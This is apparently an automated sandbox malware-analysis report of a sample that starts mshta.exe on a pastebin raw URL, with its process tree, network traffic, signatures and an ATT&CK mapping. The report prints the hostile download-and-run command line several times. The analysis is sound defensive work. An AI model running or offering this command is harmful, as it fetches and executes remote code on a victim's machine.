Loading ...

Play interactive tourEdit tour

Windows Analysis Report

Overview

General Information

Analysis ID:470697
Infos:

Most interesting Screenshot:

Detection

Score:52
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Sigma detected: Mshta Download Pastebin
Connects to a pastebin service (likely for C&C)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
JA3 SSL client fingerprint seen in connection with other malware
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates a process in suspended mode (likely to inject code)
IP address seen in connection with other malware

Classification

Process Tree

  • System is w10x64
  • cmd.exe (PID: 6360 cmdline: cmd /C 'c:\windows\system32\mshta.EXE http:\\pastebin.com\raw\i5mSzahw' MD5: F3BDBE3BB6F734E357235F4D5898582D)
    • conhost.exe (PID: 6368 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • mshta.exe (PID: 6416 cmdline: c:\windows\system32\mshta.EXE http:\\pastebin.com\raw\i5mSzahw MD5: 7083239CE743FDB68DFC933B7308E80A)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

Data Obfuscation:

barindex
Sigma detected: Mshta Download PastebinShow sources
Source: Process startedAuthor: Joe Security: Data: Command: c:\windows\system32\mshta.EXE http:\\pastebin.com\raw\i5mSzahw, CommandLine: c:\windows\system32\mshta.EXE http:\\pastebin.com\raw\i5mSzahw, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\mshta.exe, NewProcessName: C:\Windows\SysWOW64\mshta.exe, OriginalFileName: C:\Windows\SysWOW64\mshta.exe, ParentCommandLine: cmd /C 'c:\windows\system32\mshta.EXE http:\\pastebin.com\raw\i5mSzahw', ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6360, ProcessCommandLine: c:\windows\system32\mshta.EXE http:\\pastebin.com\raw\i5mSzahw, ProcessId: 6416

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results
Source: unknownHTTPS traffic detected: 104.23.98.190:443 -> 192.168.2.3:49707 version: TLS 1.2

Networking:

barindex
Connects to a pastebin service (likely for C&C)Show sources
Source: unknownDNS query: name: pastebin.com
Source: global trafficHTTP traffic detected: GET /raw/i5mSzahw HTTP/1.1Accept: */*Accept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: pastebin.comConnection: Keep-Alive
Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Joe Sandbox ViewIP Address: 104.23.98.190 104.23.98.190
Source: Joe Sandbox ViewIP Address: 104.23.98.190 104.23.98.190
Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
Source: mshta.exe, 00000002.00000002.481657075.0000000009076000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
Source: mshta.exe, 00000002.00000002.478902815.00000000053AC000.00000004.00000001.sdmpString found in binary or memory: http://pastebin.com/raw/i5mSzahw
Source: mshta.exe, 00000002.00000002.481657075.0000000009076000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: mshta.exe, 00000002.00000002.481657075.0000000009076000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
Source: mshta.exe, 00000002.00000002.481657075.0000000009076000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
Source: mshta.exe, 00000002.00000002.481657075.0000000009076000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
Source: mshta.exe, 00000002.00000002.481657075.0000000009076000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
Source: mshta.exe, 00000002.00000002.481657075.0000000009076000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: mshta.exe, 00000002.00000002.481657075.0000000009076000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: mshta.exe, 00000002.00000002.481657075.0000000009076000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
Source: mshta.exe, 00000002.00000002.481657075.0000000009076000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
Source: mshta.exe, 00000002.00000002.481657075.0000000009076000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
Source: mshta.exe, 00000002.00000002.481657075.0000000009076000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
Source: mshta.exe, 00000002.00000002.481657075.0000000009076000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
Source: mshta.exe, 00000002.00000002.481657075.0000000009076000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: mshta.exe, 00000002.00000002.481657075.0000000009076000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: mshta.exe, 00000002.00000002.481657075.0000000009076000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: mshta.exe, 00000002.00000002.481657075.0000000009076000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: mshta.exe, 00000002.00000002.481657075.0000000009076000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
Source: mshta.exe, 00000002.00000002.481657075.0000000009076000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: mshta.exe, 00000002.00000002.481657075.0000000009076000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
Source: mshta.exe, 00000002.00000002.481657075.0000000009076000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
Source: mshta.exe, 00000002.00000002.481657075.0000000009076000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
Source: mshta.exe, 00000002.00000002.481657075.0000000009076000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
Source: mshta.exe, 00000002.00000002.481657075.0000000009076000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
Source: mshta.exe, 00000002.00000002.481657075.0000000009076000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
Source: mshta.exe, 00000002.00000002.481657075.0000000009076000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
Source: mshta.exe, 00000002.00000002.478902815.00000000053AC000.00000004.00000001.sdmpString found in binary or memory: https://pastebin.com/raw/i5mSzahw
Source: unknownDNS traffic detected: queries for: clientconfig.passport.net
Source: global trafficHTTP traffic detected: GET /raw/i5mSzahw HTTP/1.1Accept: */*Accept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: pastebin.comConnection: Keep-Alive
Source: unknownHTTPS traffic detected: 104.23.98.190:443 -> 192.168.2.3:49707 version: TLS 1.2
Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe cmd /C 'c:\windows\system32\mshta.EXE http:\\pastebin.com\raw\i5mSzahw'
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\mshta.exe c:\windows\system32\mshta.EXE http:\\pastebin.com\raw\i5mSzahw
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\mshta.exe c:\windows\system32\mshta.EXE http:\\pastebin.com\raw\i5mSzahwJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32Jump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6368:120:WilError_01
Source: C:\Windows\SysWOW64\mshta.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\i5mSzahw[1]Jump to behavior
Source: classification engineClassification label: mal52.troj.evad.win@4/1@2/1
Source: C:\Windows\SysWOW64\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SettingsJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected

Data Obfuscation:

barindex
Source: C:\Windows\SysWOW64\mshta.exeCode function: 2_2_06D6E215 pushfd ; retf 2_2_06D6E21B
Source: C:\Windows\SysWOW64\mshta.exeCode function: 2_2_06D6F772 push 06D6F7B0h; retf 2_2_06D6F784
Source: C:\Windows\SysWOW64\mshta.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\mshta.exe c:\windows\system32\mshta.EXE http:\\pastebin.com\raw\i5mSzahwJump to behavior
Source: mshta.exe, 00000002.00000002.478587797.0000000003F80000.00000002.00000001.sdmpBinary or memory string: Program Manager
Source: mshta.exe, 00000002.00000002.478587797.0000000003F80000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
Source: mshta.exe, 00000002.00000002.478587797.0000000003F80000.00000002.00000001.sdmpBinary or memory string: Progman
Source: mshta.exe, 00000002.00000002.478587797.0000000003F80000.00000002.00000001.sdmpBinary or memory string: Progmanlock
Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsWindows Management InstrumentationPath InterceptionProcess Injection12Masquerading1OS Credential DumpingQuery Registry1Remote ServicesEmail Collection1Exfiltration Over Other Network MediumWeb Service1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsProcess Injection12LSASS MemoryProcess Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothEncrypted Channel2Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Obfuscated Files or Information1Security Account ManagerSystem Information Discovery12SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Binary PaddingNTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsIngress Tool Transfer1Manipulate Device CommunicationManipulate App Store Rankings or Ratings

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

SourceDetectionScannerLabelLink
clientconfig.passport.net0%VirustotalBrowse

URLs

SourceDetectionScannerLabelLink
http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
http://www.tiro.com0%URL Reputationsafe
http://www.goodfont.co.kr0%URL Reputationsafe
http://www.carterandcone.coml0%URL Reputationsafe
http://www.sajatypeworks.com0%URL Reputationsafe
http://www.typography.netD0%URL Reputationsafe
http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
http://fontfabrik.com0%URL Reputationsafe
http://www.founder.com.cn/cn0%URL Reputationsafe
http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
http://www.sandoll.co.kr0%URL Reputationsafe
http://www.urwpp.deDPlease0%URL Reputationsafe
http://www.zhongyicts.com.cn0%URL Reputationsafe
http://www.sakkal.com0%URL Reputationsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
pastebin.com
104.23.98.190
truefalse
    high
    clientconfig.passport.net
    unknown
    unknowntrueunknown

    Contacted URLs

    NameMaliciousAntivirus DetectionReputation
    http://pastebin.com/raw/i5mSzahwfalse
      high

      URLs from Memory and Binaries

      NameSourceMaliciousAntivirus DetectionReputation
      http://www.apache.org/licenses/LICENSE-2.0mshta.exe, 00000002.00000002.481657075.0000000009076000.00000002.00000001.sdmpfalse
        high
        http://www.fontbureau.commshta.exe, 00000002.00000002.481657075.0000000009076000.00000002.00000001.sdmpfalse
          high
          http://www.fontbureau.com/designersGmshta.exe, 00000002.00000002.481657075.0000000009076000.00000002.00000001.sdmpfalse
            high
            http://www.fontbureau.com/designers/?mshta.exe, 00000002.00000002.481657075.0000000009076000.00000002.00000001.sdmpfalse
              high
              http://www.founder.com.cn/cn/bThemshta.exe, 00000002.00000002.481657075.0000000009076000.00000002.00000001.sdmpfalse
              • URL Reputation: safe
              unknown
              http://www.fontbureau.com/designers?mshta.exe, 00000002.00000002.481657075.0000000009076000.00000002.00000001.sdmpfalse
                high
                http://www.tiro.commshta.exe, 00000002.00000002.481657075.0000000009076000.00000002.00000001.sdmpfalse
                • URL Reputation: safe
                unknown
                http://www.fontbureau.com/designersmshta.exe, 00000002.00000002.481657075.0000000009076000.00000002.00000001.sdmpfalse
                  high
                  http://www.goodfont.co.krmshta.exe, 00000002.00000002.481657075.0000000009076000.00000002.00000001.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  http://www.carterandcone.comlmshta.exe, 00000002.00000002.481657075.0000000009076000.00000002.00000001.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  http://www.sajatypeworks.commshta.exe, 00000002.00000002.481657075.0000000009076000.00000002.00000001.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  http://www.typography.netDmshta.exe, 00000002.00000002.481657075.0000000009076000.00000002.00000001.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  http://www.fontbureau.com/designers/cabarga.htmlNmshta.exe, 00000002.00000002.481657075.0000000009076000.00000002.00000001.sdmpfalse
                    high
                    http://www.founder.com.cn/cn/cThemshta.exe, 00000002.00000002.481657075.0000000009076000.00000002.00000001.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    http://www.galapagosdesign.com/staff/dennis.htmmshta.exe, 00000002.00000002.481657075.0000000009076000.00000002.00000001.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    http://fontfabrik.commshta.exe, 00000002.00000002.481657075.0000000009076000.00000002.00000001.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    http://www.founder.com.cn/cnmshta.exe, 00000002.00000002.481657075.0000000009076000.00000002.00000001.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    http://www.fontbureau.com/designers/frere-jones.htmlmshta.exe, 00000002.00000002.481657075.0000000009076000.00000002.00000001.sdmpfalse
                      high
                      http://www.jiyu-kobo.co.jp/mshta.exe, 00000002.00000002.481657075.0000000009076000.00000002.00000001.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://www.galapagosdesign.com/DPleasemshta.exe, 00000002.00000002.481657075.0000000009076000.00000002.00000001.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://www.fontbureau.com/designers8mshta.exe, 00000002.00000002.481657075.0000000009076000.00000002.00000001.sdmpfalse
                        high
                        http://www.fonts.commshta.exe, 00000002.00000002.481657075.0000000009076000.00000002.00000001.sdmpfalse
                          high
                          http://www.sandoll.co.krmshta.exe, 00000002.00000002.481657075.0000000009076000.00000002.00000001.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://pastebin.com/raw/i5mSzahwmshta.exe, 00000002.00000002.478902815.00000000053AC000.00000004.00000001.sdmpfalse
                            high
                            http://www.urwpp.deDPleasemshta.exe, 00000002.00000002.481657075.0000000009076000.00000002.00000001.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://www.zhongyicts.com.cnmshta.exe, 00000002.00000002.481657075.0000000009076000.00000002.00000001.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://www.sakkal.commshta.exe, 00000002.00000002.481657075.0000000009076000.00000002.00000001.sdmpfalse
                            • URL Reputation: safe
                            unknown

                            Contacted IPs

                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs

                            Public

                            IPDomainCountryFlagASNASN NameMalicious
                            104.23.98.190
                            pastebin.comUnited States
                            13335CLOUDFLARENETUSfalse

                            General Information

                            Joe Sandbox Version:33.0.0 White Diamond
                            Analysis ID:470697
                            Start date:24.08.2021
                            Start time:15:19:11
                            Joe Sandbox Product:CloudBasic
                            Overall analysis duration:0h 6m 22s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:defaultwindowscmdlinecookbook.jbs
                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                            Number of analysed new started processes analysed:27
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • HDC enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Detection:MAL
                            Classification:mal52.troj.evad.win@4/1@2/1
                            EGA Information:Failed
                            HDC Information:Failed
                            HCA Information:
                            • Successful, ratio: 100%
                            • Number of executed functions: 0
                            • Number of non-executed functions: 0
                            Cookbook Comments:
                            • Adjust boot time
                            • Enable AMSI
                            Warnings:
                            Show All
                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, UsoClient.exe
                            • Excluded IPs from analysis (whitelisted): 96.16.150.73, 20.82.210.154, 204.79.197.200, 13.107.21.200, 23.211.6.115, 23.211.4.86, 40.112.88.60, 173.222.108.226, 173.222.108.210, 80.67.82.211, 80.67.82.235
                            • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, e13551.dscg.akamaiedge.net, msagfx.live.com-6.edgekey.net, e12564.dspb.akamaiedge.net, authgfx.msa.akadns6.net, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, www.bing.com, fs.microsoft.com, dual-a-0001.a-msedge.net, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, ris.api.iris.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com
                            • Execution Graph export aborted for target mshta.exe, PID 6416 because there are no executed function
                            • Not all processes where analyzed, report is missing behavior information
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.

                            Simulations

                            Behavior and APIs

                            No simulations

                            Joe Sandbox View / Context

                            IPs

                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                            104.23.98.190C1jT7pIYSJ.exeGet hashmaliciousBrowse
                            • pastebin.com/raw/npsqXhuQ
                            uwoYazbVds.exeGet hashmaliciousBrowse
                            • pastebin.com/raw/npsqXhuQ
                            u6Wf8vCDUv.exeGet hashmaliciousBrowse
                            • pastebin.com/raw/BCAJ8TgJ
                            EU441789083.docGet hashmaliciousBrowse
                            • pastebin.com/raw/BCAJ8TgJ
                            b095b966805abb7df4ffddf183def880.exeGet hashmaliciousBrowse
                            • pastebin.com/raw/XMKKNkb0
                            E1Q0TjeN32.exeGet hashmaliciousBrowse
                            • pastebin.com/raw/XMKKNkb0
                            6YCl3ATKJw.exeGet hashmaliciousBrowse
                            • pastebin.com/raw/XMKKNkb0
                            Hjnb15Nuc3.exeGet hashmaliciousBrowse
                            • pastebin.com/raw/XMKKNkb0
                            JDgYMW0LHW.exeGet hashmaliciousBrowse
                            • pastebin.com/raw/XMKKNkb0
                            4av8Sn32by.exeGet hashmaliciousBrowse
                            • pastebin.com/raw/XMKKNkb0
                            5T4Ykc0VSK.exeGet hashmaliciousBrowse
                            • pastebin.com/raw/XMKKNkb0
                            afvhKak0Ir.exeGet hashmaliciousBrowse
                            • pastebin.com/raw/XMKKNkb0
                            T6OcyQsUsY.exeGet hashmaliciousBrowse
                            • pastebin.com/raw/XMKKNkb0
                            1KITgJnGbI.exeGet hashmaliciousBrowse
                            • pastebin.com/raw/XMKKNkb0
                            PxwWcmbMC5.exeGet hashmaliciousBrowse
                            • pastebin.com/raw/XMKKNkb0
                            XnAJZR4NcN.exeGet hashmaliciousBrowse
                            • pastebin.com/raw/XMKKNkb0
                            PbTwrajNMX.exeGet hashmaliciousBrowse
                            • pastebin.com/raw/XMKKNkb0
                            22NO7gVJ7r.exeGet hashmaliciousBrowse
                            • pastebin.com/raw/XMKKNkb0
                            rE7DwszvrX.exeGet hashmaliciousBrowse
                            • pastebin.com/raw/XMKKNkb0
                            VjPHSJkwr6.exeGet hashmaliciousBrowse
                            • pastebin.com/raw/XMKKNkb0

                            Domains

                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                            pastebin.comx7AwL2FI1Q.exeGet hashmaliciousBrowse
                            • 104.23.98.190
                            Vape Lite.exeGet hashmaliciousBrowse
                            • 104.23.98.190
                            nkW2rYkh25.exeGet hashmaliciousBrowse
                            • 104.23.98.190
                            6aOmK6gKcG.exeGet hashmaliciousBrowse
                            • 104.23.99.190
                            1LhhZPI9MH.exeGet hashmaliciousBrowse
                            • 104.23.99.190
                            vh12mmuxpj.exeGet hashmaliciousBrowse
                            • 104.23.99.190
                            HNEhMTzIxu.exeGet hashmaliciousBrowse
                            • 104.23.99.190
                            zfIIQ6GWAy.exeGet hashmaliciousBrowse
                            • 104.23.98.190
                            Y6pCQH96bh.exeGet hashmaliciousBrowse
                            • 104.23.99.190
                            GloryWSetp.exeGet hashmaliciousBrowse
                            • 104.23.98.190
                            scan00008132012_pdf.jarGet hashmaliciousBrowse
                            • 104.23.99.190
                            TJ-eProtestoBoletoIndevido.msiGet hashmaliciousBrowse
                            • 104.23.99.190
                            ContratoAprovado+002336.msiGet hashmaliciousBrowse
                            • 104.23.98.190
                            pbqkCjxPOF.exeGet hashmaliciousBrowse
                            • 104.23.98.190
                            Astolfo.exeGet hashmaliciousBrowse
                            • 104.23.99.190
                            Software updated v3.0.4.exeGet hashmaliciousBrowse
                            • 104.23.98.190
                            4KhQ6IAyV7.exeGet hashmaliciousBrowse
                            • 104.23.99.190
                            ASM9WQK4L9.exeGet hashmaliciousBrowse
                            • 104.23.99.190
                            yyyy.exeGet hashmaliciousBrowse
                            • 104.23.98.190
                            1PMElmjjXU.exeGet hashmaliciousBrowse
                            • 104.23.99.190

                            ASN

                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                            CLOUDFLARENETUSl3DR3wZJlL.exeGet hashmaliciousBrowse
                            • 162.159.129.233
                            zw9oqL7Fpb.exeGet hashmaliciousBrowse
                            • 104.21.19.200
                            loligang.armGet hashmaliciousBrowse
                            • 104.31.18.180
                            MeqPU3v7Mi.exeGet hashmaliciousBrowse
                            • 66.235.200.147
                            lates.docGet hashmaliciousBrowse
                            • 104.21.34.19
                            Bildirim_Cubugu.apkGet hashmaliciousBrowse
                            • 172.67.189.217
                            QUOTE 24082021.exeGet hashmaliciousBrowse
                            • 104.21.19.200
                            t7p1ekMto0.exeGet hashmaliciousBrowse
                            • 172.67.188.154
                            FhKq0cr6Av.exeGet hashmaliciousBrowse
                            • 104.21.86.82
                            D190a.pdf.exeGet hashmaliciousBrowse
                            • 23.227.38.74
                            Details-7125618_20210823.xlsbGet hashmaliciousBrowse
                            • 162.159.130.233
                            Details-7125618_20210823.xlsbGet hashmaliciousBrowse
                            • 162.159.129.233
                            p3Xn5MS40D.exeGet hashmaliciousBrowse
                            • 104.21.86.82
                            CONFIDENTIAL - International Conference on Military Strategies and Methods.docGet hashmaliciousBrowse
                            • 104.21.25.157
                            ATT63970.htmGet hashmaliciousBrowse
                            • 104.16.19.94
                            CONFIDENTIAL - International Conference on Military Strategies and Methods.docGet hashmaliciousBrowse
                            • 104.21.25.157
                            SecuriteInfo.com.W32.MSIL_Kryptik.DVA.genEldorado.30121.exeGet hashmaliciousBrowse
                            • 172.67.188.154
                            zXvieSHD5r.exeGet hashmaliciousBrowse
                            • 104.21.86.82
                            WiqtUEK1DH.exeGet hashmaliciousBrowse
                            • 162.159.135.233
                            6aymsd5QOF.exeGet hashmaliciousBrowse
                            • 104.21.86.82

                            JA3 Fingerprints

                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                            37f463bf4616ecd445d4a1937da06e195M43WQARL7.exeGet hashmaliciousBrowse
                            • 104.23.98.190
                            t7p1ekMto0.exeGet hashmaliciousBrowse
